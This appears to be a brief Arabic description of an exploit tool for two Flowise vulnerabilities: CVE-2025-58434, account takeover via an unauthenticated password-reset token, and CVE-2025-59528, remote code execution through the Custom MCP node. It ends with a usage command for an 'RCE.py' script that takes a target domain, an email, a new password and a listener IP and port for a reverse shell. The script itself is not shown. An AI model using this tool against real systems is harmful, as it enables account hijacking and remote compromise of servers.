
CVE-2025-58434 Flowise <= 3.0.5 والإصدارات الأقدم تسمح بالاستيلاء على الحساب عبر رمز استعادة كلمة المرور غير المُصادَق عليه. CVE-2025-59528 lowiseAI تنفيذ التعليمات البرمجية عن بُعد في Custom MCP Node.
تتيح ثغرة CVE-2025-58434 في Flowise الإصدار <= 3.0.5 والإصدارات الأقدم الاستيلاء على الحساب عبر رمز استعادة كلمة المرور (forgot-password token) دون مصادقة. كما تتيح ثغرة CVE-2025-59528 في flowiseAI تنفيذ تعليمات برمجية عن بُعد عبر عقدة MCP المخصصة.
python3 RCE.py -d "example.com" -e "[email protected]" -np "Password@a123" -lh <IP_addr> -lp <Listening_port>